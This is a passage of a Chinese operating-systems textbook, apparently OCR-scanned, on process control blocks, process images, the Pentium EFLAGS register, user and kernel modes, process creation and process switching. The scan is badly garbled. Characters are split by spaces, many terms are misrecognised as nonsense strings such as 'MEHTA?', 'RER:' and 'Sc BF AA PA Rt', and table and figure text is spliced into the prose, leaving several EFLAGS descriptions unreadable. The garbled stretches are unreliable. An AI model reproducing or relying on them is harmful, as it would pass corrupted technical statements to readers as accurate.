操作 系统 还 维护 着 文件 表 , 这 些 表 提供 关于 文件 是 否 存 在 、 文件 在 外 存 中 的 位 置 、 当 前 状态 
和 其 他 属性 的 信息 。 大 部 分 信息 ( 不 是 全 部 信息 ) 可 能 由 文件 管理 系统 维护 和 使 用 。 在 这 种 情况 
F, 操作 系统 只 有 一 点 或 者 没有 关于 文件 的 信息 ; 在 其 他 操作 系统 中 , 很 多 文件 管理 的 细节 由 操 
作 系 统 自己 管理 。 这 方面 的 内 容 将 在 第 12 章 讲述 。 

最 后 ， 操 作 系 统 为 了 管理 进程 必须 维护 进程 表 ， 本 节 的 剩余 部 分 将 着 重 讲述 所 需 的 进程 表 。 
在 此 之 前 需要 先 明 确 两 点 : 首先 ， 尽管 图 3.11 给 出 了 4 种 不 同 的 表 ，, 但 是 这 些 表 必 须 以 某 种 方 
式 链接 起 来 或 交叉 引用 。 内 存 、IO 和 文件 是 代表 进程 而 被 管理 的 ， 因 此 进程 表 中 必须 有 对 这 些 
资源 的 直接 或 间接 引用 。 文件 表 中 的 文件 可 以 通过 WO 设备 访问 , 有 时 它们 也 位 于 内 存 中 或 虚拟 
内 存 中 。 这 些 表 自身 必须 可 以 被 操作 系统 访问 到 ， 因 此 它们 受制 于 内 存 管 理 。 

AK, 操作 系统 最 初 如 何 知道 创建 表 ? DR, 操作 系统 必须 有 基本 环境 的 一 些 信息 ,如 有 多 
少 内 存 空 间 、LIO 设备 是 什么 以 及 它们 的 标识 符 是 什么 等 。 这 是 一 个 配置 问题 ， 也 就 是 说 ， 当 操 
作 系 统 初始 化 后 , 它 必 须 可 以 使 用 定义 基本 环境 的 某 些 配 置 数 据 , 这 些 数据 必须 在 操作 系统 之 外 ， 
通过 人 的 帮助 或 一 些 自动 配置 软件 而 产生 。 


3.3.2 ”进程 控制 结构 


操作 系统 在 管理 和 控制 进程 时 , 首先 必须 知道 进程 的 位 置 , 再 者 , 它 必须 知道 在 管理 时 所 必 
需 的 进程 属性 ( 如 进程 ID 、 进 程 状态 )。 
进程 位 置 

在 处 理 进程 定位 问题 和 进程 属性 问题 之 前 , 首先 需要 解决 一 个 更 基本 的 问题 : 进程 的 物理 表 
MEHTA? 进程 最 少 必 须 包 括 一 个 或 一 组 被 执行 的 程序 , 与 这 些 程序 相关 联 的 是 局 部 变量 、 全 局 
变量 和 任何 已 定义 常量 的 数据 单元 。 因 此 , 一 个 进程 至 少 包 括 足 够 的 内 存 空间 ,以 保存 该 进程 的 
程序 和 数据 ; 此 外 , 程序 的 执行 通常 涉及 用 于 跟踪 过 程 调用 和 过 程 间 参 数 传递 的 栈 ( 见 附录 1B )。 
最 后 , 与 每 个 进程 相关 联 的 还 有 操作 系统 用 于 控制 进程 的 许多 属性 , 通常 , 属性 的 集合 称 做 进程 
控制 块 ( process control block) 9 。 程 序 、 数 据 、 栈 和 属性 的 集合 称 做 进程 映像 (process image ) 
( 见 表 3.4 )。 


表 3.4 进程 映像 中 的 典型 元 素 


项 目 说 AA 
用 户 数据 用 户 空间 中 的 可 修改 部 分 ， 可 以 包括 程序 数据 、 用 户 栈 区 域 和 可 修改 的 程序 
用 户 程序 将 被 执行 的 程序 
系统 栈 每 个 进程 有 一 个 或 多 个 后 进 先 出 ( LIFO ) 系统 栈 。 栈 用 于 保存 参数 、 过 程 调用 
地 址 和 系统 调用 地 址 
进程 控制 块 操作 系统 控制 进程 所 需要 的 数据 ( 见 表 3.5 ) 


进程 映像 的 位 置 依赖 于 使 用 的 内 存 管 理 方案 。 对 于 最 简单 的 情况 , 进程 映像 保存 在 邻近 的 或 


O 这 个 数据 结构 的 其 他 一 些 常用 的 名 字 有 任务 控制 块 、 进 程 描 述 符 和 任务 描述 符 。 
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连续 的 存储 块 中 。 该 存储 块 位 于 外 存 (通常 是 磁盘 ) 中 。 因 此 ， 如 果 操 作 系统 要 管理 进程 ， 其 进 
程 映 像 至 少 有 一 部 分 必须 位 于 内 存 中 , 为 执行 该 进程 , 整个 进程 映像 必须 载 人 内 存 中 或 至 少 载 人 
虚拟 内 存 中 。 因 此 ， 操 作 系 统 需要 知道 每 个 进程 在 磁盘 中 的 位 置 ， 并 且 对 于 内 存 中 的 每 个 进程 ， 
需要 知道 其 在 内 存 中 的 位 置 。 来 看 一 下 第 2 章 中 CTSS 操作 系统 关于 这 个 方案 的 一 个 稍微 复杂 些 
的 变 体 。 在 CTSS 中 ， 当 进程 被 换 出 时 ， 部 分 进程 映像 可 能 保留 在 内 存 中 。 因 此 ， 操 作 系 统 必 须 
跟踪 每 个 进程 映像 的 哪 一 部 分 仍然 在 内 存 中 。 

现代 操作 系统 假定 分 页 硬件 允许 用 不 连续 的 物理 内 存 来 支持 部 分 常 驻 内 存 的 进程 e 。 在 任何 
给 定 的 时 刻 ， 进程 映像 的 一 部 分 可 以 在 内 存 中 ,剩余 部 分 可 以 在 外 存 中 ® 。 因 此 ， 操 作 系 统 维护 
的 进程 表 必须 表明 每 个 进程 映像 中 每 页 的 位 置 。 

图 3.11 描绘 了 位 置信 息 的 结构 。 有 一 个 主 进程 表 ， 每 个 进程 在 表 中 都 有 一 个 表 项 ， 每 一 项 
至 少 包含 一 个 指向 进程 映像 的 指针 。 如 果 进 程 映像 包括 多 个 块 , 则 这 个 信息 直接 包含 在 主 进程 表 
中 ,或 可 以 通过 交叉 引用 内 存 表 中 的 项 得 到 。 当 然 ， 这 个 描述 是 一 般 性 描述 ,特定 的 操作 系统 将 
按 自己 的 方式 组 织 位 置信 息 。 
进程 属性 

复杂 的 多 道 程序 系统 需要 关于 每 个 进程 的 大 量 信息 , 正如 前 面 所 述 , 该 信息 可 以 保留 在 进程 
控制 块 中 。 不 同 的 系统 以 不 同 的 方式 组 织 该 信息 , 本 章 和 下 一 章 的 末尾 都 有 很 多 这 样 的 例子 。 目 
前 先 简单 研究 操作 系统 将 会 用 到 的 信息 ， 而 不 详细 考虑 信息 是 如 何 组 织 的 。 

表 3.5 列 出 了 操作 系统 所 需要 的 每 个 进程 信息 的 简单 分 类 。 读者 看 到 所 需要 的 信息 量 时 可 能 
会 有 些 惊讶 。 随 着 读者 对 操作 系统 进一步 的 理解 ， 这 个 列表 看 起 来 会 更 加 合理 。 

可 以 把 进程 控制 块 信息 分 成 三 类 

@ 进程 标识 信息 

@ 处 理 器 状态 信息 

@ 进程 控制 信息 


R35 进程 控制 块 中 的 典型 元 素 
进程 标识 信息 
存储 在 进程 控制 块 中 的 数字 标识 符 ， 包 括 
© 此 进程 的 标识 符 (Process ID， 简 称 进程 ID ) 
© 创建 这 个 进程 的 进程 ( 父 进程 ) 标识 符 
s HPR (UserID, 简称 用 户 ID) 
处 理 器 状态 信息 
用 户 可 见 寄存 器 是 处 于 用 户 态 的 处 理 器 执行 的 机 器 语言 可 以 访问 的 寄存 器 。 通 常 
有 8 到 32 个 此 类 寄存 器 ， 而 在 一 些 RISC 实现 中 有 超过 100 个 此 类 寄存 器 
用 于 控制 处 理 器 操作 的 各 种 处 理 器 寄存 器 ， 包 括 : 
。 程序 计数 器 : 包含 将 要 取 的 下 一 条 指令 的 地 址 
。 条 件 码 : 最 近 的 算术 或 逻辑 运算 的 结果 (例如 符号 、 零 、 进 位 、 等 于 、 洲 出 ) 
。 状态 信息 : 包括 中 断 人 允许/ 禁用 标志 、 蜡 常 模式 
每 个 进程 有 一 个 或 多 个 与 之 相关 联 的 后 进 先 出 (LIFO ) 系统 栈 。 栈 用 于 保存 参数 
和 过 程 调用 或 系统 调用 的 地 址 ， 栈 指针 指向 栈 顶 


标识 符 


用 户 可 见 寄存 器 


控制 和 状态 寄存 器 


栈 指针 


@ 昌 关于 页 、 段 和 上 趴 拟 内 存 的 概念 ， 我 们 已 在 2.3 节 中 进行 了 简要 的 描述 。 

O 这 个 简要 的 讨论 回避 了 一 些 细节 ， 特 别 在 使 用 虚拟 内 存 的 系统 中 ， 所 有 活动 的 进程 映像 都 存储 在 外 存 中 。 当 
进程 映像 的 一 部 分 加 载 到 内 存 中 时 ， 其 加 载 过 程 是 复制 而 并 非 移 动 。 因 此 ， 外 存 保留 了 进程 映像 中 的 所 有 段 
(或 页 ) 的 拷贝 。 但 是 当 位 于 内 存 中 的 部 分 进程 映像 被 修改 时 ， 在 内 存 的 更 新 部 分 被 复制 到 外 存 以 前 ， 外 存 中 
的 进程 映像 内 容 是 过 时 的 。 





( 续 ) 





进程 控制 信息 
这 是 操作 系统 执行 其 调度 功能 所 需要 的 信息 ， 上 典型 的 信息 项 包括 : 

。 进程 状态 : 定义 将 被 调度 执行 的 进程 的 准备 情况 ( 例如 运行 态 、 就 绪 态 、 等 待 态 、 
停止 态 ) 

。 RER: 用 于 描述 进程 调度 优先 级 的 一 个 或 多 个 域 。 在 某 些 系统 中 ， 需 要 多 个 值 
( 例如 默认 、 当 前 、 最 高 许可 ) 

。 调度 相关 信息 : 这 取决 于 所 使 用 的 调度 算法 。 例 如 进程 等 待 的 时 间 总 量 和 进程 在 
上 一 次 运行 时 执行 时 间 总 量 

。 事 件 ， 进程 在 继续 执行 前 等 待 的 事件 标识 

进程 可 以 以 队列 、 环 或 者 别 的 结构 形式 与 其 他 进程 进行 链接 。 例 如 ， 所 有 具有 某 
一 特定 优先 级 且 处 于 等 待 状态 的 进程 可 链接 在 一 个 队列 中 ;进程 还 可 以 表示 出 与 另 
一 个 进程 的 父子 ( 创建 者 -被 创建 者 ) 关系 。 进 程控 制 块 为 支持 这 些 结构 需要 包含 指 
向 其 他 进程 的 指针 

与 两 个 独立 进程 间 的 通信 相关 联 的 各 种 标记 、 信 和 号 和 信息 。 进 程控 制 块 中 维护 着 
某 些 或 全 部 此 类 信息 

进程 根据 其 可 以 访问 的 内 存 空间 以 及 可 以 执行 的 指令 类 型 被 赋予 各 种 特权 。 此 外 ， 
特权 还 用 于 系统 实用 程序 和 服务 的 使 用 

存储 管理 这 一 部 分 包括 指向 描述 分 配给 该 进程 的 虚拟 内 存 空间 的 段 表 和 页 表 的 指针 

、 进程 控制 的 资源 可 以 表示 成 诸如 一 个 打开 的 文件 ， 还 可 能 包括 处 理 器 或 其 他 资源 
资源 的 所 有 权 和 使 用 情况 的 使 用 历史 ; 调度 器 会 需要 这 些 信息 


实际 上 在 所 有 的 操作 系统 中 ， 对 于 进程 标识 符 ， 每 个 进程 都 分 配 了 一 个 唯一 的 数字 标识 符 。 
进程 标识 符 可 以 简单 地 表示 为 主 进 程 表 ( 图 3.11 所 示 ) 中 的 一 个 索引 ; 和 否则， 必须 有 一 个 映射 ， 
使 得 操作 系统 可 以 根据 进程 标识 符 定 位 相应 的 表 。 这 个 标识 符 在 很 多 地 方 都 是 很 有 用 的 , 操作 系 
统 控制 的 许多 其 他 表 可 以 使 用 进程 标识 符 交 叉 引 用 进程 表 。 例如 , 内存 表 可 以 组 织 起 来 以 便 提供 
一 个 关于 内 存 的 映射 ， 指 明 每 个 区 域 分 配给 了 哪个 进程 。L/O 表 和 文件 表 中 也 会 有 类 似 的 引用 。 
当 进 程 相互 之 间 进 行 通信 时, 进程 标识 符 可 用 于 通知 操作 系统 某 一 特定 通信 的 目标 ; 当 人 允许 进程 
创建 其 他 进程 时 ， 标 识 符 可 用 于 指明 每 个 进程 的 父 进 程 和 后 代 进 程 。 

除了 进程 标识 符 ， 还 给 进程 分 配 了 一 个 用 户 标识 符 ， 用 于 标明 拥有 该 进程 的 用 户 。 

处 理 器 状态 信息 包括 处 理 器 寄存 器 的 内 容 。 当 一 个 进程 正在 运行 时 ,其 信息 当然 在 寄存 器 中 。 
当 进 程 被 中 断 时 ,所 有 的 寄存 器 信息 必须 保存 起 来 ,使 得 进程 恢复 执行 时 这 些 信息 都 可 以 被 恢复 。 
所 涉及 的 寄存 器 的 种 类 和 数目 取决 于 处 理 器 的 设计 。 在 典型 情况 下 , 寄存 器 组 包括 用 户 可 见 寄存 
器 、 控 制 和 状态 寄存 器 和 栈 指针 ， 这 些 在 第 1 章 中 都 曾 介绍 过 。 

特别 需要 注意 的 是 ， 所 有 的 处 理 器 设计 都 包括 一 个 或 一 组 通常 称 做 程序 状态 字 (Program 
Status Word, PSW ) 的 寄存 器 ， 它 包含 状态 信息 。PSW 通常 包含 条 件 码 和 其 他 状态 信息 Pentium 
处 理 器 中 的 处 理 器 状态 字 就 是 一 个 很 好 的 例子 ， 它 称 做 EFLAGS 寄存 器 ( 如 图 3.12 和 表 3.6 所 
示 )， 可 被 运行 在 Pentium 处 理 器 上 的 任何 操作 系统 ( 包括 UNIX 和 Windows ) 使 用 。 

进程 控制 块 中 第 三 个 主要 的 信息 类 可 以 称 做 进程 控制 信息 ,这 是 操作 系统 控制 和 协调 各 种 活 
动 进程 所 需要 的 额外 信息 。 表 3.5 的 最 后 一 部 分 表明 了 这 类 信息 的 范围 ,在 随后 的 章节 中 将 进 一 
步 详 细 分 析 操 作 系 统 的 功能 ， 表 中 所 列 出 的 各 项 用 途 也 会 逐渐 明了 。 

图 3.13 给 出 了 虚拟 内 存 中 进程 映像 的 结构 。 每 个 进程 映像 包括 一 个 进程 控制 块 、 用 户 栈 、 
进程 的 专用 地 址 空间 以 及 与 别 的 进程 共享 的 任何 其 他 地 址 空间 。 在 这 个 图 中 , 每 个 进程 映像 表现 
为 一 段 地 址 相 邻 的 区 域 。 在 实际 的 实现 中 可 能 不 是 这 种 情况 , 这 取决 于 内 存 管理 方案 和 操作 系统 
组 织 控制 结构 的 方法 。 


调度 和 状态 信息 
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ID 表示 标识 符 DF 表示 方向 标志 

VIP 表示 虚拟 中 断 挂 起 下 RAP RR 

VIF 表示 虚拟 中 断 标 志 。 ”TF 小 示 巍 阱 标志 

AC 表示 对 齐 检查 SF 表示 符号 标志 

VM 表示 虚拟 8086 模式 。 ZF RR BHR 

RF 表示 恢复 标志 AF 表示 辅助 进位 标志 

NT ERREZE PE 者 示 奇偶 校 验 标志 

IOPL 表示 IO 特权 级 CF 表示 进位 标志 

OF 表示 洲 出 标志 

图 3.12 Pentium I EFLAGS 寄存 器 
表 3.6 Pentium EFLAGS 寄存 器 位 
控制 位 
AC ( 对齐 检查 ) 如 果 一 个 字 或 双 字 被 定位 在 一 个 非 字 或 非 双 字 边界 时 置 位 
ID (标识 符 位 ) 如 果 这 一 位 可 以 被 置 位 和 清除 ， 处 理 器 支持 CPUID 指令 ， 这 个 指令 可 提供 关于 厂商 、 
产品 系列 和 模型 的 信息 
= 
RF ( 恢复 标志 ) 允许 程序 员 禁 止 调试 异常 , 因此 在 个 调试 异常 后 指令 可 以 重新 启动 ， 不 会 立即 引起 另 
一 个 调试 异常 
IOPL ( IO 特权 级 ) 当 置 位 时 ， 导 致 在 保护 模式 操作 期 间 ， 处 理 器 在 访问 UVO 设备 时 控制 位 产生 一 个 异常 
DECRE) 确定 字符 串 处 理 指令 是 否 增长 或 缩减 到 16 位 的 半 个 寄存 器 SI 和 DI ( 用 于 16 位 操作 ) 
i 或 32 位 寄存 器 ESI 和 EDI ( 用 于 32 位 操作 ) 
T (中 汤 允 许 标 志 ) 当 置 位 时 ， 处 理 器 将 识别 外 部 中 斯 
TF ( 陷阱 标志 ) 当 置 位 时 ， 每 个 指令 执行 后 会 引发 一 个 中 断 。 可 用 于 调试 
操作 模式 位 
NT (REESE ) RY 4WESRELEAFRPRABRE OATES 
VM (虚拟 8086 模式 ) Sc BF AA PA Rt 8086 模式 ， 这 决定 了 处 理 器 是 否 像 8086 机 那样 运行 
VIP ( 虚拟 中 断 挂 起 ) 用 于 虚拟 8086 模式 下 ， 表 明 一 个 或 多 个 中 断 正 在 等 待 服务 
VIF ( 娠 拟 中 断 标 志 ) 用 于 虚拟 8086 MAF, RRIF 
条 件 码 

AF ( $8 Bh HE LER EE ) 表示 在 一 个 使 用 AL 寄存 器 的 8 位 算术 或 逻辑 运算 中 半 个 字 节 间 的 进位 或 异 位 
CF (进位 标志 ) 表明 在 一 个 算术 运算 后 ， 最 左 位 的 进位 或 借 位 情况 。 也 可 被 一 些 移 位 或 循环 操作 改变 
OF《〈 滋 出 标志 ) 表明 在 一 次 加 法 或 减法 后 的 算术 溢出 情况 
PF (奇偶 校 验 标志 ) 表明 算术 或 多 辑 运算 结果 的 奇偶 情况 。 1 表示 代数 奇偶 校 验 ，0 表示 奇数 奇偶 校 验 
SF ( 符号 标志 ) 表明 算术 或 胃 辑 运算 结果 的 符号 位 情况 
ZF ( 零 标志 ) 表明 算术 或 逻辑 运算 的 结果 是 否 为 零 的 情况 


正如 表 3.5 中 所 指出 的 ， 进 程控 制 块 还 可 能 包含 构造 信息 ， 包 括 将 进程 控制 块 链接 起 来 的 指 
针 。 因 此 ， 前 一 节 中 所 描述 的 队列 可 以 由 进程 控制 块 的 链表 实现 ， 例 如 ， 图 3.8a 中 的 排队 结构 
可 以 按 图 3.14 中 的 方式 实现 。 


进程 控制 块 的 作用 


进程 控制 块 是 操作 系统 中 最 重要 的 数据 结构 。 每 个 进程 控制 块 包 含 操 作 系 统 所 需要 的 关于 
进程 的 所 有 信息 。 实 际 上 ,操作 系统 中 的 每 个 模块 ,包括 那些 涉及 调度 、 资 源 分 配 、 中 断 处 理 、 
性 能 监控 和 分 析 的 模块 ,都 可 能 读 取 和 修改 它们 。 可 以 说 , 资源 控制 块 集合 定义 了 操作 系统 的 


状态 。 


进程 标识 符 | 


处 理 器 状态 信息 处 理 器 状态 信息 | 》 


进程 控制 信息 进程 控制 信息 


进程 
控制 块 











图 3.13 ”虚拟 内 存 中 的 用 户 进程 


这 就 带 来 了 一 个 重要 的 设计 问题 。 操 作 系统 中 的 很 多 例 程 都 需要 访问 进程 控制 块 中 的 信息 ， 
直接 访问 这 些 表 并 不 难 ， 每 个 进程 都 有 一 个 唯一 ID 号 ， 可 用 作 进程 控制 块 指针 表 的 索引 。 困 难 
的 不 是 访问 而 是 保护 ， 具 体 表现 为 下 面 两 个 问题 : 
o 一 个 例 程 (如 中 断 处 理 程序 ) 中 有 错误 ， 
可 能 会 破坏 进程 控制 块 ， 进 而 破坏 了 系 
统 对 受 影响 进程 的 管理 能 力 。 
o 进程 控制 块 的 结构 或 语义 的 设计 变化 可 
能 会 影响 到 操作 系统 中 的 许多 模块 。 | 
这 些 问 题 可 以 通过 要 求 操作 系统 中 的 所 有 — S 
例 程 都 通过 一 个 处 理 例 程 来 专门 处 理 , 处 理 例 程 图 3.14 ”进程 链表 结构 
的 任务 仅仅 是 保护 进程 控制 块 , 它 是 读 写 这 些 块 的 唯一 的 仲裁 程序 。 使 用 这 类 进程 , 需要 权衡 性 
能 问题 和 对 系统 软件 剩余 部 分 正确 性 的 信任 程度 。 


3.4 进程 控制 


3.4.1 执行 模式 


在 继续 讨论 操作 系统 管理 进程 的 方式 之 前 ,需要 区 分 通常 与 操作 系统 相关 联 的 以 及 与 用 户 程 
序 相关 联 的 处 理 器 执行 模式 。 大 多 数 处 理 器 至 少 支持 两 种 执行 模式 。 某 些 指令 只 能 在 特权 态 下 运 
F, 包括 读 取 或 改变 诸如 程序 状态 字 之 类 控制 寄存 器 的 指令 、 原 始 VO 指令 和 与 内 存 管理 相关 的 
指令 。 另 外 ， 有 部 分 内 存 区 域 仅 在 特权 态 下 可 以 被 访问 到 。 

非特 权 态 常 称 做 用 户 态 , 这 是 因为 用 户 程序 通常 在 该 模式 下 运行 ; 特权 态 可 称 做 系统 态 、 控 
制 态 或 内 核 态 ， 内 核 态 指 的 是 操作 系统 的 内 核 ， 这 是 操作 系统 中 包含 重要 系统 功能 的 部 分 。 表 
3.7 列 出 了 操作 系统 内 核 中 通常 可 以 找到 的 功能 。 

使 用 两 种 模式 的 原因 是 很 显然 的 , 它 可 以 保护 操作 系统 和 重要 的 操作 系统 表 ( 如 进程 控制 块 ) 
不 受用 户 程序 的 干涉 。 在 内 核 态 下 , 软件 具有 对 处 理 器 以 及 所 有 指令 、 寄 存 器 和 内 存 的 控制 能 力 ， 
这 一 级 的 控制 对 用 户 程 序 不 是 必需 的 ， 并 且 为 了 安全 起 见 也 不 是 用 户 程序 可 访问 的 。 

这 样 产生 了 两 个 问题 : 处 理 器 如 何 知道 它 正在 什么 模式 下 执行 以 及 如 何 改 变 这 一 模式 。 对 第 
一 个 问题 , 程序 状态 字 中 有 一 位 表示 执行 模式 , 这 一 位 应 某 些 事件 的 要 求 而 改变 。 在 典型 情况 下 ， 


进程 控制 块 






当 用 户 调 用 一 个 操作 系统 服务 或 中 断 触发 系统 例 程 
的 执行 时 ,执行 模式 被 设置 成 内 核 态 ， 当 从 系统 服务 


G3 Ë BGK PHY 91 


表 3.7 操作 系统 内 核 的 典型 功能 


返回 到 用 户 进程 时 ,执行 模式 被 设置 为 用 户 态 。 例 如 进程 管理 
64 位 IA-64 体系 结构 的 Intel Itanium 处 理 器 , 有 一 个 ”进程 的 创建 和 终止 

处 理 器 状态 寄存 器 (PSR), 包含 2 位 的 CPL (当前 S Aaa ERAN 

特权 级 别 ) R, 级 别 0 是 最 高 特权 级 别 , 级 别 3 是 最 。 进程 同步 以 及 对 进程 间 通 信 的 支持 
低 特权 级 别 。 大 多 数 操作 系统 ， 如 Linux, HAR 。 进 程控 制 块 的 管理 

0 作为 内 核 态 ,使 用 另 一 个 级 别 作 为 用 户 态 。 当 中 断 内 存 管理 
发 生 时 ， 处 理 器 清空 大 部 分 PSR 中 的 位 ， 包 括 CPL “给 进程 分 配 地 址 宅 间 

域 , 这 将 自动 把 CPL 设置 为 0。 在 中 断 处 理 例 程 结束 “some 

时 ， 最 后 的 一 个 指令 是 irt ( 中 断 返回 )， 这 条 指令 使 OER 
处 理 器 恢复 中 断 程序 的 PSR 值 ， 也 就 是 恢复 了 程序 。 缓 冲 区 管理 

的 特权 级 别 。 当 应 用 程序 调用 一 个 系统 调用 时 ,会 发 。 。 给 进程 分 配 VO 通道 和 设备 
生 类 似 的 情况 。 对 于 Itanium， 应 用 程序 使 用 系统 调 re 支持 功能 


用 是 通过 以 下 方式 实现 的 : 把 系统 调用 标识 符 和 参数 
放 在 一 个 预定 义 的 区 域 , 然后 通过 执行 一 个 特殊 的 指 
令 中 断 用 户 态 程序 的 执行 ， 并 把 控制 权 交 给 内 核 。 


3.4.2 ”进程 创建 

3.2 节 讲 述 了 导致 创建 一 个 新 进程 的 事件 。 在 讨论 了 与 进程 相关 的 数据 结构 之 后 ， 现 在 可 以 
简单 描述 实际 创建 进程 时 包含 的 步 又 。 

一 旦 操作 系统 决定 基于 某 种 原因 ( 见 表 31) 创建 一 个 新 进程 ， 它 就 可 以 按 以 下 步骤 继续 进 


记 账 
监视 


一 


ÍT: 

1) 给 新 进程 分 配 一 个 唯一 的 进程 标识 符 。 此 时 ， 在 主 进程 表 中 增加 一 个 新 表 项 ， 表 中 的 每 
个 新 表 项 对 应 着 一 个 进程 。 

2) 给 进程 分 配 空间 。 这 包括 进程 映像 中 的 所 有 元 素 。 因 此 ， 操 作 系 统 必须 知道 私有 用 户 地 
址 空间 ( 程序 和 数据 ) 和 用 户 栈 需要 多 少 空 间 。 可 以 根据 进程 的 类 型 使 用 默认 值 ， 也 可 
以 在 作业 创建 时 根据 用 户 请 求 设置 。 如 果 一 个 进程 是 由 另 一 个 进程 生成 的 ， 则 父 进 程 可 
以 把 所 需 的 值 作为 进程 创建 请 求 的 一 部 分 传递 给 操作 系统 。 如 果 任 何 现 有 的 地 址 空间 被 
这 个 新 进程 共享 ， 则 必须 建立 正确 的 连接 。 最 后 ， 必 须 给 进程 控制 块 分 配 空间 。 

3) 初始 化 进程 控制 块 。 进 程 标 识 符 部 分 包括 进程 ID 和 其 他 相关 的 ID， 如 父 进程 的 ID 等 ; 
处 理 器 状态 信息 部 分 的 大 多 数 项 目 通 常 初始 化 成 0， 除 了 程序 计数 器 (被 置 为 程序 人 口 
AL) 和 系统 栈 指针 ( 用 来 定义 进程 栈 边 界 ); 进程 控制 信息 部 分 的 初始 化 基于 标准 默认 值 
和 为 该 进程 所 请 求 的 属性 。 例 如 ， 进 程 状 态 在 典型 情况 下 被 初始 化 成 就 绪 或 就 绪 / 挂 起 ; 
除非 显 式 地 请 求 更 高 的 优先 级 ， 否 则 优先 级 的 默认 值 为 最 低 优先 级 ; 除非 显 式 地 请 求 或 
从 父 进程 处 继承 ， 否 则 进程 最 初 不 拥有 任何 资源 (IO 设备 、 文 件 )。 

4) 设置 正确 的 连接 。 例 如 ， 如 果 操 作 系统 把 每 个 调度 队列 都 保存 成 链表 ， 则 新 进程 必须 放 
置 在 就 绪 或 就 绪 / 挂 起 链表 中 。 

5) 创建 或 扩充 其 他 数据 结构 。 例 如 ， 操 作 系 统 可 能 为 每 个 进程 保存 着 一 个 记 账 文件 ， 可 用 
于 编制 账单 和 /或 进行 性 能 评估 。 
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3.4.3 ”进程 切换 


从 表面 看 , 进程 切换 的 功能 是 很 简单 的 。 在 某 一 时 刻 , 一 个 正在 运行 的 进程 被 中 断 ， 操 作 系 
统 指定 另 一 个 进程 为 运行 态 ， 并 把 控制 权 交 给 这 个 进程 。 但 是 这 会 引发 若干 问题 。 首先, 什么 事 
件 触发 进程 的 切换 ? 另 一 个 问题 是 必须 认识 到 模式 切换 与 进程 切换 之 间 的 区 别 。 最 后 , 为 实现 进 
程 切 换 ， 操 作 系 统 必须 对 它 控制 的 各 种 数据 结构 做 些 什 么 ? 


何 时 切换 进程 
进程 切换 可 以 在 操作 系统 从 当前 正在 运行 的 进程 中 获得 控制 权 的 任何 时 刻 发 生 。 表 3.8 给 出 
了 可 能 把 控制 权 交 给 操作 系统 的 事件 。 
首先 考虑 系统 中 断 。 实 际 上 ， 大 多 数 操作 系统 区 分 两 种 类 型 的 系统 中 断 。 一 种 称 为 中 断 ， 另 
一 种 称 为 陷阱 。 前 者 与 当前 正在 运行 的 进程 无 关 的 某 种 类 型 的 外 部 事件 相关 ， 如 完成 一 次 IO 操 
作 ; 后 者 与 当前 正在 运行 的 进程 所 产生 的 错误 或 异常 条 件 相关 ， 如 非法 的 文件 访问 。 对 于 普通 中 
断 , 控制 首先 转移 给 中 断 处 理 器 , 它 做 一 些 基 本 的 辅助 工作 , 然后 转 到 与 已 经 发 生 的 特定 类 型 的 
中 断 相关 的 操作 系统 例 程 。 参 见 以 下 例子 : 
@ 时 钟 中 断 : 操作 系统 确定 当前 正在 运行 的 进程 的 执行 时 间 是 否 已 经 超过 了 最 大 允许 时 间 
段 《 时 间 片 ， 即 进程 在 被 中 断 前 可 以 执行 的 最 大 时 间 段 )， 如 果 超 过 了 ， 进程 必须 切换 到 
就 绪 态 ， 调 入 另 一 个 进程 。 
© I/O 中断 : 操作 系统 确定 是 否 发 生 了 VO 活动。 如果 VO 活动 是 一 个 或 多 个 进程 正在 等 待 
的 事件 ,操作 系统 就 把 所 有 相应 的 阻塞 态 进 程 转换 到 就 绪 态 ( 阻塞 / 挂 起 态 进程 转换 到 就 
绪 / 挂 起 态 )， 操 作 系统 必须 决定 是 继续 执行 当前 处 于 运行 态 的 进程 ， 还 是 让 具有 高 优先 
级 的 就 绪 态 进程 抢占 这 个 进程 。 
@ 内 存 失效 : 处 理 器 访问 一 个 虚拟 内 存 地 址 ， 且 此 地 址 单元 不 在 内 存 中 时 ， 操 作 系 统 必须 
从 外 存 中 把 包含 这 个 引用 的 内 存 块 〈 页 或 段 ) 调 人 内 存 中 。 在 发 出 调 人 内 存 块 的 VO 请 
求 之 后 ， 操 作 系 统 可 能 会 执行 一 个 进程 切换 ， 以 恢复 另 一 个 进程 的 执行 ,发 生 内 存 失效 
的 进程 被 置 为 阻塞 态 ， 当 想 要 的 块 调 人 内 存 中 时 ， 该 进程 被 置 为 就 绪 态 。 


表 3.8 进程 执行 的 中 断 机制 





机 制 原 使 用 

中 断 当前 指令 的 外 部 执行 对 异步 外 部 事件 的 反应 
陷阱 与 当前 指令 的 执行 相关 处 理 一 个 错误 或 异常 条 件 
系统 调用 显 式 请 求 调用 操作 系统 函数 


对 于 陷阱 ,操作 系统 确定 错误 或 异常 条 件 是 否 是 致命 的 。 如果 是 ， 当 前 正在 运行 的 进程 被 转 
换 到 退出 态 , 并 发 生 进 程 切换 ; 如 果 不 是 , 操作 系统 的 动作 取决 于 错误 的 种 类 和 操作 系统 的 设计 ， 
其 行为 可 以 是 试图 恢复 或 通知 用 户 ,操作 系统 可 能 会 进行 一 次 进程 切换 或 者 继续 执行 当前 正在 运 
行 的 进程 。 

最 后 , 操作 系统 可 能 被 来 自 正 在 执行 的 程序 的 系统 调用 激活 。 例 如 , 一 个 用 户 进程 正在 运行 ， 
并 且 正 在 执行 一 条 请 求 VO 操作 的 指令 , 如 打开 文件 , 这 个 调用 导致 转移 到 作为 操作 系统 代码 一 
部 分 的 一 个 例 程 上 执行 。 通 常 ， 使 用 系统 调用 会 导致 把 用 户 进 程 置 为 阻塞 态 。 


模式 切换 

第 1 章 讲述 了 中 断 阶段 是 指令 周期 的 一 部 分 。 在 中 断 阶段 ,处理 器 检查 是 否 发 生 了 任何 中 
断 ， 这 通过 中 斯 信号 来 表示 。 如 果 没 有 未 处 理 的 中 断 ， 处 理 器 继续 取 指 令 周 期 ， 即 取 当 前 进程 
中 的 下 一 条 指令 ， 如 果 存 在 一 个 未 处 理 的 中 断 ， 处 理 器 需要 做 以 下 工作 : 
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1) 把 程序 计数 器 置 成 中 断 处 理 程序 的 开始 地 址 。 

2) 从 用 户 态 切换 到 内 核 态 ， 使 得 中 断 处 理 代 码 可 以 包含 有 特权 的 指令 。 

处 理 器 现在 继续 取 指 阶段 ， 并 取 中 断 处 理 程序 的 第 一 条 指令 ， 它 将 给 中 断 提 供 服务 。 此 时 ， 
被 中 断 的 进程 上 下 文保 存在 被 中 断 程序 的 进程 控制 块 中 。 

